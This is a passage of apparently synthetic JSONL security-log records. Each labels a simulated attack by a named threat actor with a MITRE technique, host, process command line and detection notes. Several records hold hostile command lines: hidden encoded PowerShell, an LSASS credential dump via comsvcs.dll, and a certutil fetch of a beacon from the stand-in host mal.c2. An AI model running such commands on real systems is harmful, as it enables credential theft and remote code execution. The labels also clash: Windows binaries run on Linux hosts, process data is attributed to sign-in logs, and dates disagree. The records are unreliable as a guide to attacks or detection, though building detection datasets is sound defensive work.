-nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-25T13:13:19.000Z","user":{"name":"i-7cvblzmduqas","sid":"S-1-5-21-698490724-762976392-3520"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Discovery"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20251117T085304000Z_0012791","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.116.243.172","name":"APP-WEB-5XTQQM4UWX","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12791UNC4841T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.114.254.36","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-06-04T08:59:26.000Z","user":{"name":"CORP\\bl2io15hhx7d","sid":"S-1-5-21-798234846-720541672-6096"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Command and Control","Credential Access"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20261107T142328000Z_0012793","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.187.46.159","name":"WIN-FIN-SRV-0TFY0JDM28","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12793FIN7T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.107.158.186","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2350 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-04-06T03:16:45.000Z","user":{"name":"svc_2hlimyf6y3yo","sid":"S-1-5-21-984444253-603406380-2929"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Defense Evasion"],"technique_id":"T1546.003"},"event_id":"evt_fin7_20250908T064326000Z_0012795","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.107.73.158","name":"DB-ORACLE-OFNXM3XD01","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12795FIN7T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.67.172.234","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-05-08T16:32:28.000Z","user":{"name":"CORP\\xb1oc8qkpxbj","sid":"S-1-5-21-654304248-399132248-4956"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Initial Access","Impact","Command and Control"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20250318T111142000Z_0012797","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.143.175.248","name":"DB-ORACLE-7NAMKQQ00I","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12797APT29T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.113.41.229","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-02-06T19:51:37.000Z","user":{"name":"azuread\\4j3gzudnb2es","sid":"S-1-5-21-666255742-677604691-2620"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Lateral Movement"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20260531T125215000Z_0012799","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.209.76.5","name":"AZURE-VM-FGJKV316JJ","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12799Scattered SpiderT1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.155.25.24","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-03-29T02:41:17.000Z","user":{"name":"svc_v4axg77q1zl4","sid":"S-1-5-21-340506427-408212159-3152"}} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.